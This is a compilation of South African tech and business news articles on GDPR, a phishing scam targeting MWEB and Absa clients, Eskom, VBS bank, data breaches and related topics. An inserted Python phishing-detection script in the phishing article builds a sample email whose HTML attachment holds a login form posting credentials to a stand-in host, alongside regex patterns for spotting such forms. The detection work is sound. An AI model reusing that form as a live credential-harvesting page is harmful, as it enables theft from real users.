By Giovanni Buttarelli for The Washington Post 

First came the scaremongering. Then came the strong-arming. After being contested in arguably the biggest lobbying exercise in the history of the European Union, the General Data Protection Regulation became fully applicable at the end of May.

Since its passage, there have been great efforts at compliance, which regulators recognize. At the same time, unfortunately, consumers have felt nudged or bullied by companies into agreeing to business as usual. This would appear to violate the spirit, if not the letter, of the new law.

The GDPR aims to redress the startling imbalance of power between big tech and the consumer, giving people more control over their data and making big companies accountable for what they do with it. It replaces the 1995 Data Protection Directive, which required national legislation in each of the 28 E.U. countries in order to be implemented. And it offers people and businesses a single rulebook for the biggest data privacy questions. Tech titans now have a single point of contact instead of 28.

The new regulation, like the old directive, requires all personal data processing to be “lawful and fair.” To process data lawfully, companies need to identify the most appropriate basis for doing so. The most common method is to obtain the freely given and informed consent of the person to whom the data relates. A business can also have a “legitimate interest” to use data in the service of its aims as a business, as long as it doesn’t unduly impinge on the rights and interests of the individual. Take, for example, a pizza shop that processes your personal information, such as your home address, in order to deliver your order. It may be considered to have a legitimate interest to maintain your details for a reasonable period of time afterward in order to send you information about its services. It isn’t violating your rights, just pursuing its business interests. What the pizza shop cannot do is then offer its clients’ data to the juice shop next door without going back and requesting consent.

A third aspect of lawfully processing data pertains to contracts between a company and client. When you purchase an item online, for example, you enter into a contract. But in order for the business to fulfill that contract and send you your goods, you must offer credit card details and a delivery address. In this scenario, the business may also legitimately store your data, depending on the terms of that limited business-client relationship.

But under the GDPR, a contract cannot be used to obtain consent. Some major companies seem to be relying on take-it-or-leave-it contracts to justify their sweeping data practices. Witness the hundreds of messages telling us we cannot continue to use a service unless we agree to the data use policy. We’ve all faced the pop-up window that gives us the option of clicking a brightly colored button to simply accept the terms, with the “manage settings” or “read more” section often greyed-out. One of the big questions is the extent to which a company can justify collecting and using massive amounts of information in order to offer a “free” service.

Under E.U. law, a contractual term may be unfair if it “causes a significant imbalance in the parties’ rights and obligations arising under the contract that are to the detriment of the consumer.” The E.U. is seeking to prevent people from being cajoled into “consenting” to unfair contracts and accepting surveillance in exchange for a service. What’s more, a company is generally prohibited to process, without the “explicit consent” of the individual, sensitive types of information that may reveal race or political, religious, genetic and biometric data.

Indeed, regulators are being asked to determine whether disclosing so much data is even necessary for the provision of services — whether it is ecommerce, search or social media. One key principle to remember is that asking for an individual’s consent should be regarded as an unusual request, given that asking for consent often signals that a party wants to do something with personal data that the individual may not be comfortable with or might not reasonably expect. Thus, it should be a duty of customer care for a company to check back with users or patrons honestly, transparently and respectfully. As the Facebook/Cambridge Analytica scandal revealed, allowing an outside company to collect personal data was not the type of service that users would have reasonably expected. Clearly, abuse has become the norm. The aim of the EU data protection agency that I lead is to stop it.

Independent E.U. enforcement authorities — at least one in each E.U. member state — are already investigating 30 cases of such alleged violations, including those lodged by the activist group NOYB (“none of your business”). The public will see the first results before the end of the year. Regulators will use the full range of their enforcement powers to address abuses, including issuing fines.

The GDPR is not perfect, but it passed into law with an extraordinary consensus across the political spectrum, belying the increasingly fractious politics of our times. As of June, there were 126 countries around the world with modern data protection laws broadly modeled on the European approach. This month, Brazil is next, and it will be the biggest country to date to adopt such laws. It is likely to be followed by Pakistan and India, both of which recently published draft laws.

But if the latest effort is a reliable precedent, data protection reform comes around every two decades or so — several lifetimes in terms of the pace of technological change. We still need to finish the job with the ePrivacy Regulation still under negotiation, which would stop companies snooping on private communications and require — again — genuine consent to use metadata about who you talk to as well as when and where.

I am nevertheless already thinking about the post-GDPR future: a manifesto for the effective de-bureaucratizing and safeguarding of peoples’ digital selves. It would include a consensus among developers, companies and governments on the ethics of the underlying decisions in the application of digital technology. Devices and programming would be geared by default to safeguard people’s privacy and freedom. Today’s overcentralized Internet would be de-concentrated, as advocated by Tim Berners-Lee, who first invented the Internet, with a fairer allocation of the digital dividend and with the control of information handed back to individuals from big tech and the state.

This is a long-term project. But nothing could be more urgent as the digital world develops ever more rapidly.

Source: MyBroadband

MWEB and Absa clients have been targeted in a new e-mail phishing attack, where they are asked to open an attachment aimed at stealing their private information.

The email asks users to open an HTML attachment, which in turn opens a form in a browser which steals the victim’s personal details.

In the past, executable keyloggers were attached to emails to steal account information from victims.

However, most security services now block users from opening an attached executable file, as most of these files are malicious.

Scammers are now using HTML pages as attachments, where users are asked to provide their personal details in what appears to be a legitimate website.

In these scams, users are encouraged to open the attached file, which opens in a browser and requests their username and password for a service.

This information is then sent to the criminal’s email address using a basic PHP script.

MWEB and Absa scam email
This is the method used in the latest email scam which is targeting MWEB and Absa clients.

The email, which claims to come from MWEB – but is sent from “info@mailsynk.co.za” – tells users that their “invoices and/or receipts and statement that you requested attached to this email”.

The attachment is the phishing page, which in this case uses the domain “jehovalchristofficeinternatona.co.za” to host the scripts.

Without looking at the HTML code, there are many warning signs that this is a scam email:

  • The email does not come from MWEB or Absa. It should be noted that an email which comes from an @mweb.co.za or @absa.co.za does not automatically mean it is authentic.
  • The email is poorly structured and contains poor grammar.
  • There is no personalisation in the email, with a user’s name or account details.
  • It mentions a PDF file, but the attachment is a .htm file.
  • Users are asked to provide their personal details to view a file – a clear sign it is a phishing attack.
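The warning signs listed above can be checked mechanically at a mail gateway or in a triage script. The following Python script is an added example for this page, not code from the MyBroadband article and not the scam's own scripts: it parses a raw RFC 5322 message and flags an HTML attachment, a credential form inside that attachment, a sender domain that does not match the brand named in the headers or body, a PDF that is mentioned but not attached, and a generic greeting. Both sample messages, their sender addresses, filenames and the `hosting.example` host are constructed for the example; the `BRAND_DOMAINS` table is an assumption that mirrors the article's mention of @mweb.co.za and @absa.co.za.

```python
import re
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from email.utils import parseaddr

# Brands the scam impersonates and the domains they legitimately send from (assumed,
# after the article). As the article notes, a match here is NOT proof of authenticity;
# only a mismatch is treated as a red flag.
BRAND_DOMAINS = {"mweb": {"mweb.co.za"}, "absa": {"absa.co.za"}}


def build_sample(phishing: bool = True) -> bytes:
    """Construct a test message. Both variants are made up for this example."""
    msg = EmailMessage()
    msg["To"] = "customer@example.com"
    if phishing:
        msg["From"] = "MWEB Accounts <info@lookalike-sender.example>"
        msg["Subject"] = "Your statement"
        msg.set_content("Dear Customer,\n\ninvoices and/or receipts and statement that "
                        "you requested attached to this email. Open the PDF to view.\n")
        # Constructed stand-in for the HTML attachment: a page carrying a login form.
        msg.add_attachment('<html><body><form method="post" action="http://hosting.example/">'
                           '<input name="user"><input type="password" name="pass">'
                           '</form></body></html>', subtype="html", filename="Statement.htm")
    else:
        msg["From"] = "MWEB Accounts <billing@mweb.co.za>"
        msg["Subject"] = "Your July statement"
        msg.set_content("Dear J. Smith,\n\nYour statement for account 0000-TEST "
                        "is attached as a PDF.\n")
        msg.add_attachment(b"%PDF-1.4\n%constructed placeholder\n", maintype="application",
                           subtype="pdf", filename="statement.pdf")
    return msg.as_bytes()


def analyse(raw: bytes) -> dict:
    """Return the phishing warning signs found in a raw e-mail message."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    _, sender = parseaddr(msg.get("From", ""))
    sender_domain = sender.rpartition("@")[2].lower()
    body_part = msg.get_body(preferencelist=("plain", "html"))
    body = body_part.get_content() if body_part else ""
    attachments = list(msg.iter_attachments())
    names = [(a.get_filename() or "").lower() for a in attachments]

    # Sign 1: an HTML page as attachment (the technique described in the article).
    html_parts = [a for a, n in zip(attachments, names)
                  if n.endswith((".htm", ".html")) or a.get_content_type() == "text/html"]
    if html_parts:
        findings.append("html_attachment")
    # Sign 2: the attached page contains a form that asks for a password.
    for part in html_parts:
        content = part.get_content()
        if re.search(r"<form\b", content, re.I) and re.search(r"type=[\"']?password", content, re.I):
            findings.append("credential_form_in_attachment")

    # Sign 3: a brand is named in From/Subject/body but the sender domain is not the brand's.
    header_text = f"{msg.get('From', '')} {msg.get('Subject', '')} {body}".lower()
    for brand, domains in BRAND_DOMAINS.items():
        if re.search(rf"\b{brand}\b", header_text) and sender_domain not in domains:
            findings.append(f"brand_domain_mismatch:{brand}")

    # Sign 4: the text talks about a PDF but no .pdf is attached.
    if "pdf" in body.lower() and not any(n.endswith(".pdf") for n in names):
        findings.append("pdf_mentioned_but_not_attached")
    # Sign 5: no personalisation, just a generic salutation.
    if re.search(r"\bdear (customer|client|user|valued)\b", body, re.I):
        findings.append("generic_greeting")
    return {"sender_domain": sender_domain, "findings": findings}


if __name__ == "__main__":
    for label, flag in (("phishing sample", True), ("benign sample", False)):
        print(label, analyse(build_sample(flag)))
```

The checks are deliberately simple heuristics for triage: the benign sample produces no findings, while the constructed scam sample trips all five. As the article itself points out, a sender address on the brand's own domain is not proof of authenticity, so a clean result from this script should be read as "no obvious red flags", not as a verdict.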

By Penwell Dlamini for Sowetan Live; BusinessTech

Gauteng residents may have to wait for some time before clear word comes through on what should happen to the failed e-tolling system in the province.

Gauteng premier David Makhura tried unsuccessfully to explain to the legislature when the controversial system would be scrapped.

DA provincial leader John Moody asked Makhura when the gantries on Gauteng highways will be switched off and if those who have paid their e-toll bills will be refunded.

In his reply, Makhura said the matter is with national government and the ANC in the province would continue its campaigns for the scrapping of e-tolling.

A recent article in BusinessTech said that in an interview with Talk Radio 702’s Karima Brown, the deputy chairperson of the ANC in Gauteng, Panyaza Lesufi, avoided the question of how Gauteng’s roads will be funded and maintained going forward, instead stating that the province first needs to “let go” of the current system.

The ANC had previously stated that the controversial e-tolling system should be scrapped.

“The e-toll matter has now been referred to national government. The president [Cyril Ramaphosa] was there when we made the call that e-tolls in this province … must be scrapped. We made that point at the ANC conference. We did not say the e-tolls are scrapped. [The issue of e-tolls] is at national government, which is now responsible for this matter.

“We as the ANC are going to lead a campaign [against e-tolls]. There is no contradiction between the ANC taking up [national government]. There is no contradiction in that. We have been doing that all the time … I will lead the march to the Union Buildings. There is no contradiction in that. It will not be the first march to the Union Buildings. We are going to continue to lead in ensuring that the e-tolls become a matter of yesterday,” Makhura said.

At their recent provincial conference, Gauteng ANC members reiterated their position calling for the scrapping of e-tolls.

But the EFF is rejecting the ANC’s statement, saying the ruling party is raising the issue simply to appease voters.

“It is now going to be elections, you are starting again with this thing of yours with e-tolls. Leave the e-tolls alone. You have failed to scrap it. It is like your mother party [the ANC]; every time we go to elections, they start changing their tone with the land issue…All I am saying is that please do not fool us and try to tell us that you will do something about e-tolls. People of Gauteng must never pay e-tolls and we are not going to pay them,” said EFF MPL Ntobeng Ntobeng.

Makhura could not give any indication when national government would make its final decision on what should be done with e-tolls.

By Annie Palmer for DailyMail 

Facebook will soon be able to notify you if Russian trolls are sliding into your DMs.

The social media giant is testing a new feature that will include additional information from unfamiliar contacts who have direct messaged you on Facebook Messenger, showing things like when the account was created and the country where their phone number is registered.

It marks Facebook’s latest effort to stave off the spread of fake news on its platform.

Should the feature become available to the public, it would help prevent users from receiving potentially malicious or spammy messages from unknown users.

“We are testing a way to provide people with more context on folks they may not have connected with previously,” Facebook Messenger spokesperson Dalya Browne told Motherboard.

“This is just a small test,” she adds.

By Sibongile Khumalo for Fin24

Eskom suffered a net loss of R2.3bn in 2018, compared with a R0.9bn profit the previous year, the state-owned power producer revealed at its financial results presentation on Monday.

CEO Phakamani Hadebe said the poor results were compounded by allegations of corruption and mismanagement, challenges of governance and negative investor sentiment.

The power utility said its net cash from operations declined from R45.8bn to R37.6bn, as it struggled with leadership and operational challenges.

Eskom Chair Jabu Mabuza also said there had been R19.6bn in irregular expenditure since 2012, with much of the irregular expenditure being reported in 2018.

“This was a result of us shaking the cupboard so hard that so many skeletons came tumbling down,” he said.

“The verification and cleaning up exercise resulted in a significant increase in the number of reported irregular expenditure in 2018 (from R3bn to R19.6bn), with many of the items reported arising in prior years. Where information was not readily available, alternative methods were used where practical to identify irregular expenditure,” the utility said.

The power utility admitted that its “transition towards financial and operational sustainability required resolute, tough and decisive leadership”.

Its liquidity remained a going concern, with a massive R4.2bn owed to it by municipalities.

“Eskom continues to face significant financial and liquidity challenges in the short term, mainly due to the high debt burden, low sales growth and increased finance costs”.

Eskom debt has increased from R387bn to R600bn within four years, but steps have been taken by the board to boost investor confidence, Hadebe said.

“We have raised 22% to date of [the] R72bn borrowing requirement for 2018/19, and have a firm commitment to increase funding to 62% of the 2018/19 borrowing requirement.” He said growing investor appetite for Eskom bonds was a concern.

The power utility, which has been hit by leadership challenges, is battling a long-standing financial stability crisis, including a debt of R13.5bn owed to it by a number of municipalities.

In March, Moody’s downgraded Eskom’s credit rating to B2 from B1, citing an absence of concrete plans to place its business on a sound financial footing. B2 is the fifth rung of sub-investment grade debt.

The current wage demands by unions are also adding to the firm’s financial woes, with labour unions currently discussing Eskom’s latest options of 7% and 7.5% increases, which were tabled after a round of bruising negotiations.

The firm initially offered no increases, citing its difficult financial position. Eskom and the unions were drawn to the negotiation table by Public Enterprises Minister Pravin Gordhan in a bid to avert a crippling strike by workers.

In June, the National Energy Regulator (Nersa) approved R32.69bn for Eskom’s multi-year price determination Regulatory Clearing Account (RCA) applications – funds Eskom must recover due to an electricity shortfall or an escalation in operating costs.

Was Absa’s drone show illegal?

By Timothy Rangongo and Jay Caboz for Business Insider SA

Absa put on Africa’s first “drone firework” show in partnership with technology giant Intel above Johannesburg last Wednesday night, but it is not clear how it got permission to do so.

Questions have been raised about the event because neither Absa nor Intel seems to have a licence to operate drones, nor do they seem to have registered the 300-odd drones that were involved.

South Africa has strict licensing requirements for drones, in part to protect those beneath them.

Current rules require companies to have an air-service licence issued by the Air Service License Council (which resides at the Department of Transport) as well as a remote operator’s certificate (ROC) from the South African Civil Aviation Authority (CAA), responsible for regulating the civil aviation industry.

Drone operators must also have a Remote Pilot License (RPL), as they would be using the drones for commercial purposes, says technology lawyer at Michalsons, Lisa Emma-Iwuoha.

Strictly speaking, each of the 300 Absa drones should be individually licensed before they can take off, she says.

Such licensing is a tedious process that has taken local companies years to organise, according to Jono O’Connell, owner of Timeslice, a licensed drone company in the film industry in Cape Town.

“Many of us were contacted only a month ago to quote on this project and we all said it could not happen in such a short space in time,” O’Connell tells Business Insider South Africa.

“I have waited nearly two years for one [letter of approval] and at best around eight months. I said organising a job like this within the time frame would be impossible.”

In response to the allegations that they were flying drones illegally over Johannesburg, Absa told Business Insider it had received the correct permission to use the airspace above two sites, Nasrec and the Johannesburg CBD, from the CAA in June.

But a CAA letter seen by Business Insider shows approval was granted on 5 July for safety and security procedures for a “once-off special event”.

The letter also mentions a company called NTSU Aviation Solutions, which Absa says was contracted to acquire permissions for the use of the airspace only.

To obtain such permission, a company must either have an Air Service License (ASL) or an operating certificate, according to aviation lawyer, Chris Christodoulou of Christodoulou & Mavrikis Inc.

One of NTSU’s co-founders, Sam Twala, confirmed to Business Insider that the company is not a drone operator, as it doesn’t have a certificate for operating drones.

Twala said he couldn’t comment on whether the company has an Air Service License, and referred us to the company website – which does not contain that information.

NTSU is not listed on the CAA’s organisations that currently hold ROC licenses.

Further investigation shows that the founders of NTSU are former employees at the regulatory body.

Twala worked in the remotely-piloted aircraft division at CAA while his co-founder, Dale McErlean, is a former flight inspector responsible for new drone company applications.

Drone company owners verified their former positions.

But Absa says all is above board and Intel was given “special permission” by the CAA.

“I really want to promote drones and what Absa is doing is fantastic. How can it be fair to fast-track one operation while dozens of others get left lying in limbo? The way this was done goes against the regulations we are strictly held to,” says O’Connell.

“We’re all happy to play by the rules. What’s good for the goose is good for the gander. Unfortunately what seems in this case is that is not what’s transpired,” says O’Connell.

Even the chairman of the council responsible for granting licences to fly drones in SA, Michael Mabasa, was perplexed at the operation.

Debit order disputes on the rise

By Carin Smith for Fin24

Debit order disputes have increased significantly over the last three years, according to the Payments Association of South Africa (PASA).

Yet, it said recent investigations have shown that in the majority of cases, proof that debit orders were indeed authorised by consumers could be provided.

According to PASA, the increase in debit order disputes could mean that companies have bad practices in obtaining such debit order mandates, or that consumers are asking their banks to reverse actual valid debit orders.

Consumers could be doing this because the reversal of such legitimate debit orders creates temporary cash flow relief for them. PASA emphasises, however, that this kind of behaviour by consumers is not acceptable and has become a huge concern for the financial services industry.

As part of a project to reduce debit order disputes, banks are investigating ways to enhance their current dispute and prosecution processes.

Over the last few years PASA has been working with banks to address debit order abuse. Initiatives include statistically identifying potentially problematic companies, refining the minimum criteria for mandates, and managing a debit order abuse list which can result in “rogue companies” being excluded from the system.

Initiatives also include a process to investigate and issue fines or initiating forensic investigations and prosecution when companies do not have mandates or have mandates that do not conform to minimum requirements.

DebiCheck

One of the most pertinent, but longer-term solutions to curb debit order abuse remains the Authenticated Collections project that was started in 2013.

Now close to implementation, the project will deliver a new type of debit order, called DebiCheck. Currently there are 11 banks participating in DebiCheck. Through this new debit order system, a debit order will only be processed to a consumer’s account if the mandate for such a debit order has been electronically confirmed by the consumer.

This means that consumers will be aware of which DebiCheck debit orders will be processed to their accounts – and these debit orders will not be processed by the bank if they are outside the agreed conditions the consumer initially confirmed.

As a result, PASA foresees that the number of invalid debit orders being processed as well as the number of consumer disputes where valid mandates are in place will rapidly decline.

Improving safety and efficiency

Additionally, an interbank committee has been established and mandated to improve the safety and efficiency of debit orders. This is through including new ways to better identify existing users abusing the system, enhanced measures and support to ensure offenders are adequately investigated and prosecuted, and processes that will assist in curtailing improper consumer behaviour.

PASA says consumers continue to have the right to dispute or instruct their bank to reverse debit orders they have not agreed to, or which are processed outside the mandate they have given.

They should continue to be watchful when entering into contracts – verbally, in writing or electronically. PASA also encourages consumers to check their bank statements on a regular basis, and not to provide or confirm account information if they are not certain what exactly it will be used for.

The industry is currently involved in the prosecution of certain rogue collectors. PASA believes the new measures it is working on will significantly assist the authorities and improve the success of prosecution.

By Warren Thompson for Business Day 

The South African Reserve Bank painted a grim picture on Monday that suggests as much as 75% of VBS Mutual Bank’s assets may have been stolen by its executives and directors.

“It’s a travesty that the failure of management put so many depositors at risk,” said Bank governor Lesetja Kganyago, at a media conference on the curatorship of VBS.

“Institutions such as banks rely on the governance processes, but when it’s the people responsible for the bank that are the ones perpetrating the crime, no amount of regulation can prevent that,” he said.

VBS, which was formed as a building society in the former Venda homeland, came to national prominence in 2016 when it gave former president Jacob Zuma a R7.8m loan after he was ordered to repay the state for upgrades made to his Nkandla home.

The bank’s failure may yet have grave consequences for municipalities in some of the poorest parts of the country, which stand to lose almost all of the R1.6bn they deposited with VBS, increasing the risk of budget shortfalls and violent protests that could result from a lack of service delivery.

Curator Anoosh Rooplal’s timing of the action he instituted on Friday to recover more than R1.5bn from the bank’s largest shareholder, Vele Investments, as well as from the bank’s executives and directors, was done to prevent further “dissipation of assets”.

But the amount of money stolen relative to the bank’s total assets is harder to establish, partly because the bank deliberately misled the regulator and also due to problems with the quality of its audit, which led the bank to withdraw its 2017 financial results.

Rooplal did not rule out seeking damages from the bank’s external auditor, KPMG, and the bank’s internal auditor, PwC, when the forensic report is completed towards the end of August.

According to the bank’s last available annual financial statements to end-March 2016, the bank had total assets of just more than R1bn.

By the end of January 2018, according to data provided by VBS to the Reserve Bank, the bank held total assets of R2bn, meaning it had doubled its balance sheet in the space of two years.

When asked what, if any, part of VBS’s loan book was performing, the curator said that the home loan mortgage book of about R400m was performing consistently with credit extended under arm’s-length credit agreements.

The performance of the vehicle finance book was mixed, with the curator noting a deterioration in the credit quality in the months leading up to the intervention by the Reserve Bank.

Based on a balance sheet of about R2bn, and with the curator seeking to recover R1.5bn from the “perpetrators of the fraudulent scheme”, it seems possible that as much as 75% of the bank’s balance sheet has disappeared.

Retail deposits

But there was relief for small depositors, with the Reserve Bank announcing that it has obtained a guarantee of R330m from the Treasury should it fall short in recovering the money owed to them.

The Bank announced last week that retail deposits, which include individuals, burial societies and stokvels, would be guaranteed to a maximum of R100,000 per customer.

This means that 97% of all depositors at the bank will be refunded their entire savings.

Source: The Citizen 

R1 666 to rent an office chair for a month may seem a bit steep, but that’s exactly what the bankrupt state insurer is charging.

Are you sitting down for this?

The Road Accident Fund has pushed through a contract for the rental of 300 office chairs for almost half a million rand a month, in what amounts to R1 666 per chair, the Sunday Times has reported.

Another furniture contract with the same company, Gxakwes Projects, for R60-million, did not go ahead. Neither contract went through a tendering process.

The fund is technically insolvent, with contingent liabilities totalling almost R190 billion, hence its attempts to make money by renting out office furniture.

The RAF takes R1.93 of every litre of South African petrol sold.

This has not helped them avoid a R34.7-million loss last year.

While the fund admits that renting furniture was “not the best option”, they say they need to do so “to settle claims immediately, resulting in a creditors book of about R8 billion.”

Transport Minister Blade Nzimande dissolved the fund’s board this week, declaring it dysfunctional and affected by “serious divisions”.

Gxakwes Projects, the company involved in the furniture contracts, has been red-flagged by the National Treasury after a similar deal was entered into with Eskom, which wanted R24 million for the purchase of 9 217 chairs.

An inspection by the Treasury found that only 500 chairs were needed.

The attempt to secure a five year, R60-million contract without a tender was thwarted by some board members concerned that the “process is fraught with legal concerns.”

Reports of the goings on at the struggling state insurer are a bit like a car crash. As horrific as it is, you can’t look away.

By Tehillah Niselow for Fin24 

Liberty Holdings customers received SMSs on Saturday alerting them that personal information related to their insurance policies could have been stolen by an external party.

The Information Regulator, which has asked for information about the Liberty breach, is clearly concerned about the increasing number of cyber attacks affecting personal data in South Africa.

“Without a fully functional Information Regulator, these breaches will continue to occur without sanctions provided for in the Protection of Personal Information Act (POPIA),” said chairperson Advocate Pansy Tlakula.

Tlakula urged “the powers that be to assist it in fast tracking its operationalisation”.

According to corporate law firm Michalsons, certain limited sections of POPIA have already been implemented. However, the bulk of the legislation will only commence at a later date, to be proclaimed by the president. As there is a one-year grace period, the POPIA deadline might only be set for the end of 2019 or in 2020.

In the meantime, South Africans are coming under heightened attack from cyber criminals and hackers.

Andrew Chester, MD of Ukuvuma Security, told Fin24 that affected clients or users should immediately alert their banks and cellphone provider. They should also undertake a credit check as well as a Google search to determine whether their personal information is in the public domain.

Liberty email hack

In SMSs to clients on Saturday, financial services company Liberty informed them that its email repository had been breached by a third party trying to demand a “ransom” in exchange for the data.

Liberty has not revealed much about the breach, citing a police investigation. CEO David Munro confirmed that Liberty’s insurance clients were the only ones affected, and that none of its other business had been compromised.

The company said none of its clients have been impacted financially, and that individuals will be personally advised if their information has been affected.

ViewFines licence details

In May the Hawks, the State Security Agency and the Information Regulator said they would probe the breach of personal records of 943 000 South African drivers, allegedly from online traffic fine website ViewFines.

The information reportedly contained the names, identity numbers and email addresses of South African drivers stored on the ViewFines website in plaintext.

The ViewFines website is owned by Aggregated Payment Systems. News24 reported that its operations manager confirmed the company was “implementing security measures immediately” to improve the website after being informed of the breach.

The source of the data was located by Troy Hunt, an Australian security researcher and creator of the free service Have I Been Pwned, which checks whether an individual’s information has been compromised.

Facebook scandal

While Facebook founder and CEO Mark Zuckerberg had to face angry lawmakers in the US and European Union, it was reported that the data breach involving the UK political consultancy affected almost 60 000 South African users.

In May, the Information Commissioner’s Office of the United Kingdom (which regulates Facebook outside the US and Canada) advised the Information Regulator of South Africa that over 87 million people had been affected worldwide.

However, no evidence could be found of South Africans having been targeted, as the majority of users involved were in the US.

Master Deed’s data breach “biggest” digital security threat in SA

Hunt was once again instrumental in revealing what was known as the “biggest” data breach in South African history, together with iAfrikan CEO Tefo Mohapi in October 2017.

Over 60 million South Africans’ personal data, from ID numbers to company directorships, was believed to have been affected.

The information was traced to Jigsaw Holdings, a holding company for several real estate firms including Realty1, ERA and Aida. The information reportedly came from credit bureau agencies, and was used to vet potential clients.

The information trove was found not to have been hacked, as it was stored in an easily accessible manner on an open web server.

Ster-Kinekor’s database compromised

Movie theatre chain Ster-Kinekor was responsible for up to 7 million South Africans falling victim to a data leak in March 2017.

Fin24 reported that Durban developer Matt Cavanagh announced he had discovered a flaw in Ster-Kinekor’s booking website, and that he had reported it to the company.

There were between 6 and 7 million users in the database. Of those, 1.6 million people had email addresses linked to them on the movie theatre chain’s database.

My Office News Ⓒ 2017 - Designed by A Collective